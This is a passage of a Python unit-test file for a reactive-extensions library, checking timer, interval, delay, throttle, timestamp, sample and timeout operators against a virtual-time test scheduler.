xs = scheduler.create_hot_observable(on_next(205, 1), on_next(210, 2), on_next(240, 3), on_next(280, 4), on_next(320, 5), on_next(350, 6), on_next(370, 7), on_next(420, 8), on_next(470, 9), on_completed(600))
def create():
return xs.buffer_with_time_or_count(70, 3, scheduler).select(lambda x: ",".join([str(a) for a in x]))
results = scheduler.start(create, disposed=370)
results.messages.assert_equal(on_next(240, "1,2,3"), on_next(310, "4"), on_next(370, "5,6,7"))
xs.subscriptions.assert_equal(subscribe(200, 370))
def test_oneshot_timer_timespan_basic():
scheduler = TestScheduler()
def create():
return Observable.timer(duetime=300, scheduler=scheduler)
results = scheduler.start(create)
results.messages.assert_equal(on_next(500, 0), on_completed(500))
def test_oneshot_timer_timespan_zero():
scheduler = TestScheduler()
def create():
return Observable.timer(0, scheduler=scheduler)
results = scheduler.start(create)
results.messages.assert_equal(on_next(201, 0), on_completed(201))
def test_oneshot_timer_timespan_negative():
scheduler = TestScheduler()
def create():
return Observable.timer(-1, scheduler=scheduler)
results = scheduler.start(create)
results.messages.assert_equal(on_next(201, 0), on_completed(201))
def test_oneshot_timer_timespan_disposed():
scheduler = TestScheduler()
def create():
return Observable.timer(1000, scheduler=scheduler)
results = scheduler.start(create)
results.messages.assert_equal()
def test_oneshot_timer_timespan_observer_throws():
scheduler1 = TestScheduler()
xs = Observable.timer(1, scheduler=scheduler1)
xs.subscribe(lambda x: _raise("ex"))
try:
return scheduler1.start()
except RxException:
pass
scheduler2 = TestScheduler()
ys = Observable.timer(1, period=None, scheduler=scheduler2)
ys.subscribe(on_completed=lambda: _raise("ex"))
try:
return scheduler2.start()
except RxException:
pass
def test_interval_timespan_basic():
scheduler = TestScheduler()
def create():
return Observable.interval(100, scheduler=scheduler)
results = scheduler.start(create)
results.messages.assert_equal(on_next(300, 0), on_next(400, 1), on_next(500, 2), on_next(600, 3), on_next(700, 4), on_next(800, 5), on_next(900, 6))
def test_interval_timespan_zero():
    """interval(0) ticks every virtual-time unit; disposal at 210 caps the output."""
    sched = TestScheduler()
    res = sched.start(lambda: Observable.interval(0, scheduler=sched), disposed=210)
    res.messages.assert_equal(
        on_next(201, 0), on_next(202, 1), on_next(203, 2), on_next(204, 3),
        on_next(205, 4), on_next(206, 5), on_next(207, 6), on_next(208, 7),
        on_next(209, 8))
def test_interval_timespan_negative():
    """A negative period is treated like zero — one tick per virtual-time unit."""
    sched = TestScheduler()
    res = sched.start(lambda: Observable.interval(-1, scheduler=sched), disposed=210)
    res.messages.assert_equal(
        on_next(201, 0), on_next(202, 1), on_next(203, 2), on_next(204, 3),
        on_next(205, 4), on_next(206, 5), on_next(207, 6), on_next(208, 7),
        on_next(209, 8))
def test_interval_timespan_disposed():
    """No tick fits before the default disposal when the period is 1000."""
    sched = TestScheduler()
    res = sched.start(lambda: Observable.interval(1000, scheduler=sched))
    res.messages.assert_equal()
def test_interval_timespan_observer_throws():
    """An on_next handler that raises propagates as RxException from start()."""
    sched = TestScheduler()
    src = Observable.interval(1, scheduler=sched)
    src.subscribe(lambda x: _raise("ex"))
    try:
        return sched.start()
    except RxException:
        pass
def test_delay_timespan_simple1():
    """delay(100) shifts every notification (including completion) forward 100 ticks."""
    sched = TestScheduler()
    src = sched.create_hot_observable(
        on_next(150, 1), on_next(250, 2), on_next(350, 3), on_next(450, 4),
        on_completed(550))
    res = sched.start(lambda: src.delay(100, scheduler=sched))
    res.messages.assert_equal(
        on_next(350, 2), on_next(450, 3), on_next(550, 4), on_completed(650))
    src.subscriptions.assert_equal(subscribe(200, 550))
def test_delay_datetime_offset_simple1_impl():
    """delay with an absolute datetime (300ms epoch offset) acts like delay(100)."""
    sched = TestScheduler()
    src = sched.create_hot_observable(
        on_next(150, 1), on_next(250, 2), on_next(350, 3), on_next(450, 4),
        on_completed(550))
    res = sched.start(lambda: src.delay(datetime.fromtimestamp(300 / 1000), sched))
    res.messages.assert_equal(
        on_next(350, 2), on_next(450, 3), on_next(550, 4), on_completed(650))
    src.subscriptions.assert_equal(subscribe(200, 550))
def test_delay_timespan_simple2_impl():
    """delay(50) shifts each notification forward 50 ticks."""
    sched = TestScheduler()
    src = sched.create_hot_observable(
        on_next(150, 1), on_next(250, 2), on_next(350, 3), on_next(450, 4),
        on_completed(550))
    res = sched.start(lambda: src.delay(50, sched))
    res.messages.assert_equal(
        on_next(300, 2), on_next(400, 3), on_next(500, 4), on_completed(600))
    src.subscriptions.assert_equal(subscribe(200, 550))
def test_delay_datetime_offset_simple2_impl():
    """Absolute-datetime delay (250ms epoch offset) acts like delay(50)."""
    sched = TestScheduler()
    src = sched.create_hot_observable(
        on_next(150, 1), on_next(250, 2), on_next(350, 3), on_next(450, 4),
        on_completed(550))
    res = sched.start(lambda: src.delay(datetime.fromtimestamp(250 / 1000), sched))
    res.messages.assert_equal(
        on_next(300, 2), on_next(400, 3), on_next(500, 4), on_completed(600))
    src.subscriptions.assert_equal(subscribe(200, 550))
def test_delay_timespan_simple3_impl():
    """delay(150) shifts each notification forward 150 ticks."""
    sched = TestScheduler()
    src = sched.create_hot_observable(
        on_next(150, 1), on_next(250, 2), on_next(350, 3), on_next(450, 4),
        on_completed(550))
    res = sched.start(lambda: src.delay(150, sched))
    res.messages.assert_equal(
        on_next(400, 2), on_next(500, 3), on_next(600, 4), on_completed(700))
    src.subscriptions.assert_equal(subscribe(200, 550))
def test_delay_datetime_offset_simple3_impl():
    """Absolute-datetime delay (350ms epoch offset) acts like delay(150)."""
    sched = TestScheduler()
    src = sched.create_hot_observable(
        on_next(150, 1), on_next(250, 2), on_next(350, 3), on_next(450, 4),
        on_completed(550))
    res = sched.start(lambda: src.delay(datetime.fromtimestamp(0.350), sched))
    res.messages.assert_equal(
        on_next(400, 2), on_next(500, 3), on_next(600, 4), on_completed(700))
    src.subscriptions.assert_equal(subscribe(200, 550))
def test_delay_timespan_error1_impl():
    """Values are delayed by 50 but the error passes through at its original time."""
    err = 'ex'
    sched = TestScheduler()
    src = sched.create_hot_observable(
        on_next(150, 1), on_next(250, 2), on_next(350, 3), on_next(450, 4),
        on_error(550, err))
    res = sched.start(lambda: src.delay(50, sched))
    res.messages.assert_equal(
        on_next(300, 2), on_next(400, 3), on_next(500, 4), on_error(550, err))
    src.subscriptions.assert_equal(subscribe(200, 550))
def test_delay_datetime_offset_error1_impl():
    """Datetime-based delay (250ms): values shift by 50, the error is not delayed."""
    err = 'ex'
    sched = TestScheduler()
    src = sched.create_hot_observable(
        on_next(150, 1), on_next(250, 2), on_next(350, 3), on_next(450, 4),
        on_error(550, err))
    res = sched.start(lambda: src.delay(datetime.fromtimestamp(0.250), sched))
    res.messages.assert_equal(
        on_next(300, 2), on_next(400, 3), on_next(500, 4), on_error(550, err))
    src.subscriptions.assert_equal(subscribe(200, 550))
def test_delay_timespan_error2_impl():
    """With delay(150) the error overtakes the last pending value (4 is dropped)."""
    err = 'ex'
    sched = TestScheduler()
    src = sched.create_hot_observable(
        on_next(150, 1), on_next(250, 2), on_next(350, 3), on_next(450, 4),
        on_error(550, err))
    res = sched.start(lambda: src.delay(150, sched))
    res.messages.assert_equal(on_next(400, 2), on_next(500, 3), on_error(550, err))
    src.subscriptions.assert_equal(subscribe(200, 550))
def test_delay_datetime_offset_error2_impl():
    """Datetime-based delay (350ms): error overtakes the last pending value."""
    err = 'ex'
    sched = TestScheduler()
    src = sched.create_hot_observable(
        on_next(150, 1), on_next(250, 2), on_next(350, 3), on_next(450, 4),
        on_error(550, err))
    res = sched.start(lambda: src.delay(datetime.fromtimestamp(0.350), sched))
    res.messages.assert_equal(on_next(400, 2), on_next(500, 3), on_error(550, err))
    src.subscriptions.assert_equal(subscribe(200, 550))
def test_delay_empty():
    """Completion of an otherwise-empty sequence is delayed by 10 ticks."""
    sched = TestScheduler()
    src = sched.create_hot_observable(on_next(150, 1), on_completed(550))
    res = sched.start(lambda: src.delay(10, sched))
    res.messages.assert_equal(on_completed(560))
    src.subscriptions.assert_equal(subscribe(200, 550))
def test_delay_error():
    """Errors are forwarded immediately — delay does not postpone them."""
    err = 'ex'
    sched = TestScheduler()
    src = sched.create_hot_observable(on_next(150, 1), on_error(550, err))
    res = sched.start(lambda: src.delay(10, sched))
    res.messages.assert_equal(on_error(550, err))
    src.subscriptions.assert_equal(subscribe(200, 550))
def test_delay_never():
    """A source that never terminates yields nothing; subscription runs to disposal."""
    sched = TestScheduler()
    src = sched.create_hot_observable(on_next(150, 1))
    res = sched.start(lambda: src.delay(10, sched))
    res.messages.assert_equal()
    src.subscriptions.assert_equal(subscribe(200, 1000))
def test_throttle_timespan_allpass():
    """With gaps (50) larger than the window (40) every value passes, shifted by 40."""
    sched = TestScheduler()
    src = sched.create_hot_observable(
        on_next(150, 1), on_next(200, 2), on_next(250, 3), on_next(300, 4),
        on_next(350, 5), on_next(400, 6), on_next(450, 7), on_next(500, 8),
        on_completed(550))
    res = sched.start(lambda: src.throttle(40, sched))
    return res.messages.assert_equal(
        on_next(290, 3), on_next(340, 4), on_next(390, 5), on_next(440, 6),
        on_next(490, 7), on_next(540, 8), on_completed(550))
def test_throttle_timespan_allpass_error_end():
    """Same as allpass, but the terminal error is forwarded at its own time."""
    err = 'ex'
    sched = TestScheduler()
    src = sched.create_hot_observable(
        on_next(150, 1), on_next(200, 2), on_next(250, 3), on_next(300, 4),
        on_next(350, 5), on_next(400, 6), on_next(450, 7), on_next(500, 8),
        on_error(550, err))
    res = sched.start(lambda: src.throttle(40, sched))
    return res.messages.assert_equal(
        on_next(290, 3), on_next(340, 4), on_next(390, 5), on_next(440, 6),
        on_next(490, 7), on_next(540, 8), on_error(550, err))
def test_throttle_timespan_alldrop():
    """A 60-tick window longer than every gap drops all but the final value."""
    sched = TestScheduler()
    src = sched.create_hot_observable(
        on_next(150, 1), on_next(200, 2), on_next(250, 3), on_next(300, 4),
        on_next(350, 5), on_next(400, 6), on_next(450, 7), on_next(500, 8),
        on_completed(550))
    res = sched.start(lambda: src.throttle(60, sched))
    return res.messages.assert_equal(on_next(550, 8), on_completed(550))
def test_throttle_timespan_alldrop_error_end():
    """When the source errors, even the pending final value is discarded."""
    err = 'ex'
    sched = TestScheduler()
    src = sched.create_hot_observable(
        on_next(150, 1), on_next(200, 2), on_next(250, 3), on_next(300, 4),
        on_next(350, 5), on_next(400, 6), on_next(450, 7), on_next(500, 8),
        on_error(550, err))
    res = sched.start(lambda: src.throttle(60, sched))
    return res.messages.assert_equal(on_error(550, err))
def test_throttle_timespan_some_drop():
    """Mixed gaps: values arriving within 50 ticks of a newer one are dropped."""
    sched = TestScheduler()
    src = sched.create_hot_observable(
        on_next(150, 1), on_next(250, 2), on_next(350, 3), on_next(370, 4),
        on_next(421, 5), on_next(480, 6), on_next(490, 7), on_next(500, 8),
        on_completed(600))
    res = sched.start(lambda: src.throttle(50, sched))
    return res.messages.assert_equal(
        on_next(300, 2), on_next(420, 4), on_next(471, 5), on_next(550, 8),
        on_completed(600))
def test_throttle_empty():
    """Throttling an empty sequence just forwards its completion."""
    sched = TestScheduler()
    res = sched.start(lambda: Observable.empty(sched).throttle(10, sched))
    res.messages.assert_equal(on_completed(201))
def test_throttle_error():
    """Throttling an erroring sequence just forwards its error."""
    err = 'ex'
    sched = TestScheduler()
    res = sched.start(lambda: Observable.throw_exception(err, sched).throttle(10, sched))
    res.messages.assert_equal(on_error(201, err))
def test_throttle_never():
    """Throttling a never-terminating sequence yields nothing."""
    sched = TestScheduler()
    res = sched.start(lambda: Observable.never().throttle(10, sched))
    res.messages.assert_equal()
def test_throttle_duration_delay_behavior():
    """Identical 20-tick duration selectors delay each value by 20; none overlap."""
    sched = TestScheduler()
    src = sched.create_hot_observable(
        on_next(150, -1), on_next(250, 0), on_next(280, 1), on_next(310, 2),
        on_next(350, 3), on_next(400, 4), on_completed(550))
    # Five structurally identical cold durations, one per source value.
    ys = [sched.create_cold_observable(on_next(20, 42), on_next(25, 99))
          for _ in range(5)]
    res = sched.start(lambda: src.throttle_with_selector(lambda x: ys[x]))
    res.messages.assert_equal(
        on_next(270, 0), on_next(300, 1), on_next(330, 2), on_next(370, 3),
        on_next(420, 4), on_completed(550))
    src.subscriptions.assert_equal(subscribe(200, 550))
    ys[0].subscriptions.assert_equal(subscribe(250, 270))
    ys[1].subscriptions.assert_equal(subscribe(280, 300))
    ys[2].subscriptions.assert_equal(subscribe(310, 330))
    ys[3].subscriptions.assert_equal(subscribe(350, 370))
    ys[4].subscriptions.assert_equal(subscribe(400, 420))
def test_throttle_duration_throttle_behavior():
    """Longer durations (40, 60) are cut short by the next value, dropping 1 and 3."""
    sched = TestScheduler()
    src = sched.create_hot_observable(
        on_next(150, -1), on_next(250, 0), on_next(280, 1), on_next(310, 2),
        on_next(350, 3), on_next(400, 4), on_completed(550))
    # Per-value duration lengths; each cold observable fires at d and d+5.
    ys = [sched.create_cold_observable(on_next(d, 42), on_next(d + 5, 99))
          for d in (20, 40, 20, 60, 20)]
    res = sched.start(lambda: src.throttle_with_selector(lambda x: ys[x]))
    res.messages.assert_equal(
        on_next(270, 0), on_next(330, 2), on_next(420, 4), on_completed(550))
    src.subscriptions.assert_equal(subscribe(200, 550))
    ys[0].subscriptions.assert_equal(subscribe(250, 270))
    ys[1].subscriptions.assert_equal(subscribe(280, 310))
    ys[2].subscriptions.assert_equal(subscribe(310, 330))
    ys[3].subscriptions.assert_equal(subscribe(350, 400))
    ys[4].subscriptions.assert_equal(subscribe(400, 420))
def test_throttle_duration_early_completion():
    """Source completion at 410 flushes the pending value (4) immediately."""
    sched = TestScheduler()
    src = sched.create_hot_observable(
        on_next(150, -1), on_next(250, 0), on_next(280, 1), on_next(310, 2),
        on_next(350, 3), on_next(400, 4), on_completed(410))
    ys = [sched.create_cold_observable(on_next(d, 42), on_next(d + 5, 99))
          for d in (20, 40, 20, 60, 20)]
    res = sched.start(lambda: src.throttle_with_selector(lambda x: ys[x]))
    res.messages.assert_equal(
        on_next(270, 0), on_next(330, 2), on_next(410, 4), on_completed(410))
    src.subscriptions.assert_equal(subscribe(200, 410))
    ys[0].subscriptions.assert_equal(subscribe(250, 270))
    ys[1].subscriptions.assert_equal(subscribe(280, 310))
    ys[2].subscriptions.assert_equal(subscribe(310, 330))
    ys[3].subscriptions.assert_equal(subscribe(350, 400))
    ys[4].subscriptions.assert_equal(subscribe(400, 410))
def test_throttle_duration_inner_error():
    """An error from the duration observable of the last value terminates the result."""
    sched = TestScheduler()
    src = sched.create_hot_observable(
        on_next(150, 1), on_next(250, 2), on_next(350, 3), on_next(450, 4),
        on_completed(550))
    err = 'ex'
    def factory():
        def duration(x):
            if x < 4:
                return sched.create_cold_observable(
                    on_next(x * 10, "Ignore"), on_next(x * 10 + 5, "Aargh!"))
            return sched.create_cold_observable(on_error(x * 10, err))
        return src.throttle_with_selector(duration)
    res = sched.start(factory)
    res.messages.assert_equal(
        on_next(270, 2), on_next(380, 3), on_error(490, err))
    src.subscriptions.assert_equal(subscribe(200, 490))
def test_throttle_duration_outer_error():
    """A source error at 460 interrupts the pending 4 and is forwarded as-is."""
    err = 'ex'
    sched = TestScheduler()
    src = sched.create_hot_observable(
        on_next(150, 1), on_next(250, 2), on_next(350, 3), on_next(450, 4),
        on_error(460, err))
    def factory():
        duration = lambda x: sched.create_cold_observable(
            on_next(x * 10, "Ignore"), on_next(x * 10 + 5, "Aargh!"))
        return src.throttle_with_selector(duration)
    res = sched.start(factory)
    res.messages.assert_equal(
        on_next(270, 2), on_next(380, 3), on_error(460, err))
    src.subscriptions.assert_equal(subscribe(200, 460))
def test_throttle_duration_selector_throws():
    """An exception raised by the duration selector errors the result at that tick."""
    err = 'ex'
    sched = TestScheduler()
    src = sched.create_hot_observable(
        on_next(150, 1), on_next(250, 2), on_next(350, 3), on_next(450, 4),
        on_completed(550))
    def factory():
        def duration(x):
            if x < 4:
                return sched.create_cold_observable(
                    on_next(x * 10, "Ignore"), on_next(x * 10 + 5, "Aargh!"))
            _raise(err)
        return src.throttle_with_selector(duration)
    res = sched.start(factory)
    res.messages.assert_equal(
        on_next(270, 2), on_next(380, 3), on_error(450, err))
    src.subscriptions.assert_equal(subscribe(200, 450))
def test_throttle_duration_inner_done_delay_behavior():
    """Duration completion (not just on_next) releases the pending value."""
    sched = TestScheduler()
    src = sched.create_hot_observable(
        on_next(150, 1), on_next(250, 2), on_next(350, 3), on_next(450, 4),
        on_completed(550))
    factory = lambda: src.throttle_with_selector(
        lambda x: sched.create_cold_observable(on_completed(x * 10)))
    res = sched.start(factory)
    res.messages.assert_equal(
        on_next(270, 2), on_next(380, 3), on_next(490, 4), on_completed(550))
    src.subscriptions.assert_equal(subscribe(200, 550))
def test_throttle_duration_inner_done_throttle_behavior():
    """Values superseded before their duration completes (3 and 5) are dropped."""
    sched = TestScheduler()
    src = sched.create_hot_observable(
        on_next(150, 1), on_next(250, 2), on_next(280, 3), on_next(300, 4),
        on_next(400, 5), on_next(410, 6), on_completed(550))
    factory = lambda: src.throttle_with_selector(
        lambda x: sched.create_cold_observable(on_completed(x * 10)))
    res = sched.start(factory)
    res.messages.assert_equal(
        on_next(270, 2), on_next(340, 4), on_next(470, 6), on_completed(550))
    src.subscriptions.assert_equal(subscribe(200, 550))
# def test_window_time_basic():
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(150, 1), on_next(210, 2), on_next(240, 3), on_next(270, 4), on_next(320, 5), on_next(360, 6), on_next(390, 7), on_next(410, 8), on_next(460, 9), on_next(470, 10), on_completed(490))
# def create():
# def selector(ys, i):
# def proj(y):
# return "%s %s" % (i, y)
# return ys.select(proj).concat(Observable.return_value('%s end' % i))
# return xs.window_with_time(100, scheduler=scheduler).select(selector).merge_observable()
# results = scheduler.start(create)
# results.messages.assert_equal(on_next(210, "0 2"), on_next(240, "0 3"), on_next(270, "0 4"), on_next(300, "0 end"), on_next(320, "1 5"), on_next(360, "1 6"), on_next(390, "1 7"), on_next(400, "1 end"), on_next(410, "2 8"), on_next(460, "2 9"), on_next(470, "2 10"), on_next(490, "2 end"), on_completed(490))
# xs.subscriptions.assert_equal(subscribe(200, 490))
# def test_Window_Time_Basic_Both():
# , xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(150, 1), on_next(210, 2), on_next(240, 3), on_next(270, 4), on_next(320, 5), on_next(360, 6), on_next(390, 7), on_next(410, 8), on_next(460, 9), on_next(470, 10), on_completed(490))
# results = scheduler.start(create)
# return xs.window_with_time(100, 50, scheduler).select(function (ys, i) {
# return ys.select(function (y) {
# return i + " " + y
# }).concat(Observable.returnValue(i + " end"))
# }).merge_observable()
# results.messages.assert_equal(on_next(210, "0 2"), on_next(240, "0 3"), on_next(270, "0 4"), on_next(270, "1 4"), on_next(300, "0 end"), on_next(320, "1 5"), on_next(320, "2 5"), on_next(350, "1 end"), on_next(360, "2 6"), on_next(360, "3 6"), on_next(390, "2 7"), on_next(390, "3 7"), on_next(400, "2 end"), on_next(410, "3 8"), on_next(410, "4 8"), on_next(450, "3 end"), on_next(460, "4 9"), on_next(460, "5 9"), on_next(470, "4 10"), on_next(470, "5 10"), on_next(490, "4 end"), on_next(490, "5 end"), on_completed(490))
# xs.subscriptions.assert_equal(subscribe(200, 490))
class TimeInterval(object):
    """A value paired with the interval (in ms) since the previous element.

    ``interval`` may be given as a ``timedelta`` (converted to whole
    milliseconds) or as a plain number of milliseconds.
    """

    def __init__(self, value, interval):
        if isinstance(interval, timedelta):
            # NOTE(review): .microseconds ignores the seconds/days components
            # of the timedelta; kept as-is since test intervals are < 1 s.
            interval = int(interval.microseconds / 1000)
        self.value = value
        self.interval = interval

    def __str__(self):
        return "%s@%s" % (self.value, self.interval)

    def equals(self, other):
        # Bug fix: the original signature was `equals(other)` — missing
        # `self` — so every call bound the argument to `self` and then
        # raised NameError/TypeError. Now a proper instance method.
        return other.interval == self.interval and other.value == self.value
def test_time_interval_regular():
    """time_interval reports each value with the gap since the previous one."""
    sched = TestScheduler()
    src = sched.create_hot_observable(
        on_next(150, 1), on_next(210, 2), on_next(230, 3), on_next(260, 4),
        on_next(300, 5), on_next(350, 6), on_completed(400))
    factory = lambda: src.time_interval(sched).select(
        lambda x: TimeInterval(x.value, x.interval)).dump()
    res = sched.start(factory)
    res.messages.assert_equal(
        on_next(210, TimeInterval(2, 10)), on_next(230, TimeInterval(3, 20)),
        on_next(260, TimeInterval(4, 30)), on_next(300, TimeInterval(5, 40)),
        on_next(350, TimeInterval(6, 50)), on_completed(400))
def test_time_interval_empty():
    """time_interval over an empty sequence forwards the completion."""
    sched = TestScheduler()
    res = sched.start(lambda: Observable.empty(sched).time_interval(sched))
    res.messages.assert_equal(on_completed(201))
def test_time_interval_error():
    """time_interval over an erroring sequence forwards the error."""
    err = 'ex'
    sched = TestScheduler()
    res = sched.start(
        lambda: Observable.throw_exception(err, sched).time_interval(sched))
    res.messages.assert_equal(on_error(201, err))
def test_time_interval_never():
    """time_interval over a never-terminating sequence yields nothing."""
    sched = TestScheduler()
    res = sched.start(lambda: Observable.never().time_interval(sched))
    res.messages.assert_equal()
class Timestamp(object):
    """A value paired with the (virtual) time at which it was produced.

    ``timestamp`` may be a ``datetime`` (converted to ms since the epoch
    reference) or a plain number of milliseconds.
    """

    def __init__(self, value, timestamp):
        if isinstance(timestamp, datetime):
            timestamp = timestamp - datetime.fromtimestamp(0)
            # NOTE(review): .microseconds drops the seconds/days parts of
            # the timedelta; kept as-is to match the original conversion.
            timestamp = int(timestamp.microseconds / 1000)
        self.value = value
        self.timestamp = timestamp

    def __str__(self):
        return "%s@%s" % (self.value, self.timestamp)

    def equals(self, other):
        # Bug fix: the original signature was `equals(other)` — missing
        # `self` — so every call bound the argument to `self` and then
        # raised NameError/TypeError. Now a proper instance method.
        return other.timestamp == self.timestamp and other.value == self.value
def test_timestamp_regular():
    """timestamp pairs each value with its virtual emission time."""
    sched = TestScheduler()
    src = sched.create_hot_observable(
        on_next(150, 1), on_next(210, 2), on_next(230, 3), on_next(260, 4),
        on_next(300, 5), on_next(350, 6), on_completed(400))
    factory = lambda: src.timestamp(sched).select(
        lambda x: Timestamp(x.value, x.timestamp))
    res = sched.start(factory)
    res.messages.assert_equal(
        on_next(210, Timestamp(2, 210)), on_next(230, Timestamp(3, 230)),
        on_next(260, Timestamp(4, 260)), on_next(300, Timestamp(5, 300)),
        on_next(350, Timestamp(6, 350)), on_completed(400))
def test_timestamp_empty():
    """timestamp over an empty sequence forwards the completion.

    Bug fix: the original called ``time_interval`` (copy-paste from the
    test_time_interval_* group), so the ``timestamp`` operator was never
    exercised by this test.
    """
    scheduler = TestScheduler()
    def create():
        return Observable.empty(scheduler).timestamp(scheduler=scheduler)
    results = scheduler.start(create)
    results.messages.assert_equal(on_completed(201))
def test_timestamp_error():
    """timestamp over an erroring sequence forwards the error.

    Bug fix: the original called ``time_interval`` (copy-paste from the
    test_time_interval_* group), so the ``timestamp`` operator was never
    exercised by this test.
    """
    ex = 'ex'
    scheduler = TestScheduler()
    def create():
        return Observable.throw_exception(ex, scheduler).timestamp(scheduler=scheduler)
    results = scheduler.start(create)
    results.messages.assert_equal(on_error(201, ex))
def test_timestamp_never():
    """timestamp over a never-terminating sequence yields nothing.

    Bug fix: the original called ``time_interval`` (copy-paste from the
    test_time_interval_* group), so the ``timestamp`` operator was never
    exercised by this test.
    """
    scheduler = TestScheduler()
    def create():
        return Observable.never().timestamp(scheduler=scheduler)
    results = scheduler.start(create)
    results.messages.assert_equal()
def test_sample_regular():
    """sample(50) emits the latest value at each 50-tick boundary."""
    sched = TestScheduler()
    src = sched.create_hot_observable(
        on_next(150, 1), on_next(210, 2), on_next(230, 3), on_next(260, 4),
        on_next(300, 5), on_next(350, 6), on_next(380, 7), on_completed(390))
    res = sched.start(lambda: src.sample(50, scheduler=sched))
    res.messages.assert_equal(
        on_next(250, 3), on_next(300, 5), on_next(350, 6), on_next(400, 7),
        on_completed(400))
def test_sample_error_in_flight():
    """An error between sampling ticks is forwarded immediately at its own time."""
    err = 'ex'
    sched = TestScheduler()
    src = sched.create_hot_observable(
        on_next(150, 1), on_next(210, 2), on_next(230, 3), on_next(260, 4),
        on_next(300, 5), on_next(310, 6), on_error(330, err))
    res = sched.start(lambda: src.sample(50, scheduler=sched))
    res.messages.assert_equal(on_next(250, 3), on_next(300, 5), on_error(330, err))
def test_sample_empty():
    """Sampling an empty sequence forwards the completion."""
    sched = TestScheduler()
    res = sched.start(
        lambda: Observable.empty(scheduler=sched).sample(0, scheduler=sched))
    res.messages.assert_equal(on_completed(201))
def test_sample_error():
    """Sampling an erroring sequence forwards the error."""
    err = 'ex'
    sched = TestScheduler()
    res = sched.start(
        lambda: Observable.throw_exception(err, scheduler=sched).sample(0, scheduler=sched))
    res.messages.assert_equal(on_error(201, err))
def test_sample_never():
    """Sampling a never-terminating sequence yields nothing."""
    sched = TestScheduler()
    res = sched.start(lambda: Observable.never().sample(0, scheduler=sched))
    res.messages.assert_equal()
def test_timeout_in_time():
    """With a 500-tick timeout longer than every gap, the source passes through."""
    sched = TestScheduler()
    src = sched.create_hot_observable(
        on_next(150, 1), on_next(210, 2), on_next(230, 3), on_next(260, 4),
        on_next(300, 5), on_next(350, 6), on_completed(400))
    res = sched.start(lambda: src.timeout(500, None, scheduler=sched))
    res.messages.assert_equal(
        on_next(210, 2), on_next(230, 3), on_next(260, 4), on_next(300, 5),
        on_next(350, 6), on_completed(400))
def test_timeout_out_of_time():
    """A 205-tick timeout is never exceeded here — every gap stays under it."""
    sched = TestScheduler()
    src = sched.create_hot_observable(
        on_next(150, 1), on_next(210, 2), on_next(230, 3), on_next(260, 4),
        on_next(300, 5), on_next(350, 6), on_completed(400))
    res = sched.start(lambda: src.timeout(205, scheduler=sched))
    res.messages.assert_equal(
        on_next(210, 2), on_next(230, 3), on_next(260, 4), on_next(300, 5),
        on_next(350, 6), on_completed(400))
def test_timeout_timeout_occurs_1():
    """No value within 100 ticks of subscribe → switch to the fallback at 300."""
    sched = TestScheduler()
    src = sched.create_hot_observable(
        on_next(70, 1), on_next(130, 2), on_next(310, 3), on_next(400, 4),
        on_completed(500))
    other = sched.create_cold_observable(
        on_next(50, -1), on_next(200, -2), on_next(310, -3), on_completed(320))
    res = sched.start(lambda: src.timeout(100, other, scheduler=sched))
    res.messages.assert_equal(
        on_next(350, -1), on_next(500, -2), on_next(610, -3), on_completed(620))
    src.subscriptions.assert_equal(subscribe(200, 300))
    other.subscriptions.assert_equal(subscribe(300, 620))
def test_timeout_timeout_occurs_2():
    """Two values pass (240, 310), then the 100-tick gap trips at 410."""
    sched = TestScheduler()
    src = sched.create_hot_observable(
        on_next(70, 1), on_next(130, 2), on_next(240, 3), on_next(310, 4),
        on_next(430, 5), on_completed(500))
    other = sched.create_cold_observable(
        on_next(50, -1), on_next(200, -2), on_next(310, -3), on_completed(320))
    res = sched.start(lambda: src.timeout(100, other, scheduler=sched))
    res.messages.assert_equal(
        on_next(240, 3), on_next(310, 4), on_next(460, -1), on_next(610, -2),
        on_next(720, -3), on_completed(730))
    src.subscriptions.assert_equal(subscribe(200, 410))
    other.subscriptions.assert_equal(subscribe(410, 730))
def test_timeout_timeout_occurs_never():
    """After the timeout trips, an empty fallback stays subscribed until disposal."""
    sched = TestScheduler()
    src = sched.create_hot_observable(
        on_next(70, 1), on_next(130, 2), on_next(240, 3), on_next(310, 4),
        on_next(430, 5), on_completed(500))
    other = sched.create_cold_observable()
    res = sched.start(lambda: src.timeout(100, other, scheduler=sched))
    res.messages.assert_equal(on_next(240, 3), on_next(310, 4))
    src.subscriptions.assert_equal(subscribe(200, 410))
    other.subscriptions.assert_equal(subscribe(410, 1000))
def test_timeout_timeout_occurs_completed():
    """A silent source times out at 300 even though it would complete later."""
    sched = TestScheduler()
    src = sched.create_hot_observable(on_completed(500))
    other = sched.create_cold_observable(on_next(100, -1))
    res = sched.start(lambda: src.timeout(100, other, scheduler=sched))
    res.messages.assert_equal(on_next(400, -1))
    src.subscriptions.assert_equal(subscribe(200, 300))
    other.subscriptions.assert_equal(subscribe(300, 1000))
def test_timeout_timeout_occurs_error():
    """A silent source times out at 300 even though it would error later."""
    sched = TestScheduler()
    src = sched.create_hot_observable(on_error(500, 'ex'))
    other = sched.create_cold_observable(on_next(100, -1))
    res = sched.start(lambda: src.timeout(100, other, scheduler=sched))
    res.messages.assert_equal(on_next(400, -1))
    src.subscriptions.assert_equal(subscribe(200, 300))
    other.subscriptions.assert_equal(subscribe(300, 1000))
def test_timeout_timeout_not_occurs_completed():
    """Completion at 250 beats the 300 deadline; the fallback is never used."""
    sched = TestScheduler()
    src = sched.create_hot_observable(on_completed(250))
    other = sched.create_cold_observable(on_next(100, -1))
    res = sched.start(lambda: src.timeout(100, other, scheduler=sched))
    res.messages.assert_equal(on_completed(250))
    src.subscriptions.assert_equal(subscribe(200, 250))
    other.subscriptions.assert_equal()
def test_timeout_timeout_not_occurs_error():
    """An error at 250 beats the 300 deadline; the fallback is never used."""
    err = 'ex'
    sched = TestScheduler()
    src = sched.create_hot_observable(on_error(250, err))
    other = sched.create_cold_observable(on_next(100, -1))
    res = sched.start(lambda: src.timeout(100, other, scheduler=sched))
    res.messages.assert_equal(on_error(250, err))
    src.subscriptions.assert_equal(subscribe(200, 250))
    other.subscriptions.assert_equal()
def test_timeout_timeout_does_not_occur():
    """Every gap stays under 100 ticks, so the source passes through untouched."""
    sched = TestScheduler()
    src = sched.create_hot_observable(
        on_next(70, 1), on_next(130, 2), on_next(240, 3), on_next(320, 4),
        on_next(410, 5), on_completed(500))
    other = sched.create_cold_observable(
        on_next(50, -1), on_next(200, -2), on_next(310, -3), on_completed(320))
    res = sched.start(lambda: src.timeout(100, other, scheduler=sched))
    res.messages.assert_equal(
